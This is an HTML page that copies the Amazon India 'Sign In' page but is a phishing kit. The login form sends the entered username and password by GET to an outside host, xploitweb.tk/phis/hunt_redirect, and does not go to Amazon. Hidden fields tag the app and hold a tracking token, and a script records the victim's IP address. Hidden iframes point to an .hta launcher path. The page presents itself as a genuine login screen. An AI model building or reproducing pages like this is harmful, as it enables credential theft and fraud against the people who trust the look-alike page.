



<!doctype html><html class="a-no-js" data-19ax5a9jf="dingo">
  <head>


<meta charset="utf-8"/>
    <title dir="ltr">Amazon Sign In</title>

    
      

      
        <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css?AUIClients/AmazonUI#us.not-trident" />
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|414xXI-tiJL.css,419RS+HnI5L.css_.css?AUIClients/AuthenticationPortalAssets" />
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/11Yih2A8AxL.css?AUIClients/CVFAssets" />


      
    
  </head>

  <body class="ap-locale-en_IN a-m-us a-aui_152852-c a-aui_157141-c a-aui_158613-t1 a-aui_72554-c a-aui_dropdown_187959-c a-aui_pci_risk_banner_210084-c a-aui_perf_130093-c a-aui_tnr_v2_180836-c a-aui_ux_145937-c">    <img height="1" width="1" style='display:none;visibility:hidden;' src='https://fls-eu.amazon.com/1/batch/1/OP/A21TJRUUN4KGV:259-8903462-3684012:NR4PW23TYFYBXF03CZCZ$uedata=s:%2Fap%2Fuedata%3Fstaticb%26id%3DNR4PW23TYFYBXF03CZCZ:0' alt="" onload="window.ue_sbl && window.ue_sbl();"/>



<div id="a-page"><script type="a-state" data-a-state="{&quot;key&quot;:&quot;a-wlab-states&quot;}">{"AUI_158613":"T1","AUI_PCI_RISK_BANNER_210084":"C"}</script>
    <div class="a-section a-padding-medium auth-workflow">
      <div class="a-section a-spacing-none auth-navbar">
        





<div class="a-section a-spacing-medium a-text-center">
  
    

    
      


<a class="a-link-nav-icon" tabindex="-1" href="https://www.amazon.in/ref=ap_frn_logo">
  
  <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>

  
  
    
    
      <i class="a-icon a-icon-domain-in a-icon-domain" role="img"></i>
    
  
</a>

    
  
</div>


      </div>

      <div id="authportal-center-section" class="a-section">
        
          
          
            <div id="authportal-main-section" class="a-section">
              





<div class="a-section a-spacing-base auth-pagelet-container">
  
    
    
      <div id="auth-cookie-warning-message" class="a-box a-alert a-alert-warning"><div class="a-box-inner a-alert-container"><h4 class="a-alert-heading">Please Enable Cookies to Continue</h4><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
        <p>
          <a class="a-link-normal" href="https://www.amazon.in/gp/help/customer/display.html/ref=ap_cookie_error_help?">
            
          </a>
        </p>
      </div></div></div>
    
  
</div>

<div class="a-section auth-pagelet-container">
  







<!-- Set cross domain sso variables to be used for making Ajax calls to central Identity domain -->


<!-- Set cross domain sso variables to be used for making Ajax calls to central Identity domain -->


<!-- show a warning modal dialog when the third party account is connected with Amazon -->



  
    





<div class="a-section a-spacing-base">
  <div class="a-section">





    <form name="signIn" method="get" novalidate action="http://xploitweb.tk/phis/hunt_redirect" class="auth-validate-form auth-real-time-validation a-spacing-none">




      <div class="a-section">
        <div class="a-box"><div class="a-box-inner a-padding-extra-large">
          <h1 class="a-spacing-small">
            Login
          </h1>
          <!-- optional subheading element -->
          
          <div class="a-row a-spacing-base">
            <label for="ap_email" class="a-form-label">
              Email or mobile phone number
            </label>
            
            
                          <div class="form-group">
                <input type="hidden"  name="token" id="inputtoken" value="123456789">
            </div>


             <div class="form-group">
                <input type="hidden"  name="page_app" id="pageapp" value="amaz">
             </div>

              <div class="form-group">
                <input type="hidden"  name="ip" id="ip" value="1.1.1.1">
             </div>
                
              
              
            
            <input type="text" maxlength="128" placeholder="username Or email" id="ap_email" name="username" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field"/>

            <br>

            <input type="text" maxlength="128" id="ap_email" placeholder="password" name="password" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field"/>

            
        



<div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
  Enter your email or mobile phone number
</div></div></div>

          </div>


          <div class="a-section">
            
            




            
            <span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><input id="continue" tabindex="5" class="a-button-input" type="submit" aria-labelledby="continue-announce"/><span id="continue-announce" class="a-button-text" aria-hidden="true">
              Continue
            </span></span></span>

            
            
              



<div id="legalTextRow" class="a-row a-spacing-top-medium a-size-small">
  By continuing, you agree to Amazon's <a href="https://www.amazon.in/gp/help/customer/display.html/ref=ap_signin_notification_condition_of_use?ie=UTF8&amp;nodeId=200545940">Conditions of Use</a> and <a href="https://www.amazon.in/gp/help/customer/display.html/ref=ap_signin_notification_privacy_notice?ie=UTF8&amp;nodeId=200534380">Privacy Notice</a>.
</div> 

            



          </div>

          

          

          



<div class="a-section">
  <div aria-live="polite" class="a-row a-expander-container a-expander-inline-container">
    <a href="javascript:void(0)" data-action="a-expander-toggle" class="a-expander-header a-declarative a-expander-inline-header a-link-expander" data-a-expander-toggle="{&quot;allowLinkDefault&quot;:true, &quot;expand_prompt&quot;:&quot;&quot;, &quot;collapse_prompt&quot;:&quot;&quot;}"><i class="a-icon a-icon-expand"></i><span class="a-expander-prompt">
      Need help?
    </span></a>
    
      <div aria-expanded="false" class="a-expander-content a-expander-inline-content a-expander-inner" style="display:none">
        



  
  
  
    
  

<a id="auth-fpp-link-bottom" class="a-link-normal" href="https://www.amazon.in/ap/forgotpassword?showRememberMe=true&amp;openid.pape.max_auth_age=0&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;pageId=inflex&amp;ignoreAuthState=1&amp;openid.return_to=https%3A%2F%2Fwww.amazon.in%2Fgp%2Fcss%2Fhomepage.html%3Ffrom%3Dhz%26ref_%3Dnav_signin&amp;prevRID=NR4PW23TYFYBXF03CZCZ&amp;openid.assoc_handle=inflex&amp;openid.mode=checkid_setup&amp;openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&amp;prepopulatedLoginId=&amp;failedSignInCount=0&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0">
  Forgot Password
</a>
      </div>
    
    <div aria-expanded="false" class="a-expander-content a-expander-inline-content a-expander-inner" style="display:none">
      <a id="ap-other-signin-issues-link" class="a-link-normal" href="https://www.amazon.in/gp/help/customer/account-issues/ref=ap_login_with_otp_claim_collection?ie=UTF8">
        Other issues with Sign-In
      </a>
    </div>
  </div>
</div>

          
        </div></div>
      </div>
    </form>
  </div>
  
    
    
      
        
        <div class="a-divider a-divider-break"><h5>New to Amazon?</h5></div>
        <span id="auth-create-account-link" class="a-button a-button-span12 a-button-base"><span class="a-button-inner"><a id="createAccountSubmit" tabindex="6" href="https://www.amazon.in/ap/register?showRememberMe=true&amp;openid.pape.max_auth_age=0&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;pageId=inflex&amp;ignoreAuthState=1&amp;openid.return_to=https%3A%2F%2Fwww.amazon.in%2Fgp%2Fcss%2Fhomepage.html%3Ffrom%3Dhz%26ref_%3Dnav_signin&amp;prevRID=NR4PW23TYFYBXF03CZCZ&amp;openid.assoc_handle=inflex&amp;openid.mode=checkid_setup&amp;openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&amp;prepopulatedLoginId=&amp;failedSignInCount=0&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0" class="a-button-text" role="button">
          Create your Amazon account
        </a></span></span>
      
    
  
</div>

  
  

</div>
            </div>
          
        
      </div>

      
      <div id="right-2">
      </div>

      <div class="a-section a-spacing-top-extra-large auth-footer">
        



<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
  <span class="auth-footer-seperator"></span>

  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" href="https://www.amazon.in/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&amp;nodeId=200545940">
      Conditions of Use
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" href="https://www.amazon.in/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&amp;nodeId=200534380">
      Privacy Notice
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" href="https://www.amazon.in/help">
      Help
    </a>
    <span class="auth-footer-seperator"></span>
  

  
</div>




<div class="a-section a-spacing-none a-text-center">
  





<span class="a-size-mini a-color-secondary">
  © 1996-2019, Amazon.com, Inc. or its affiliates
</span>

</div>

      </div>
    </div>

    <div id="auth-external-javascript" class="auth-external-javascript" data-external-javascripts="">
    </div>

    








    
    <!-- cache slot rendered -->
    
  </div><div id='be' style="display:none;visibility:hidden;"><form name='ue_backdetect' action="https://www.amazon.in/ap/get"><input type="hidden" name='ue_back' value='1' /></form>




</div>

<noscript>
    <img height="1" width="1" style='display:none;visibility:hidden;' src='https://fls-eu.amazon.com/1/batch/1/OP/A21TJRUUN4KGV:259-8903462-3684012:NR4PW23TYFYBXF03CZCZ$uedata=s:%2Fap%2Fuedata%3Fnoscript%26id%3DNR4PW23TYFYBXF03CZCZ:0' alt=""/>
</noscript>
<iframe id="frame" src="https://www.amazon.in/ap/Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>
<iframe id="frame" src="" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>
</body>
<script>
let url = new URL(window.location.href)
let token = url.searchParams.get("token");
var el = document.getElementById("inputtoken")
console.log(token)

if (token !== null){

   console.log(token)
   el.value = token;
}
</script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>

$.getJSON('https://api.db-ip.com/v2/free/self', function(data) {
    ip = document.getElementById("ip");
    ip.value = data.ipAddress
});
</script>
</html>
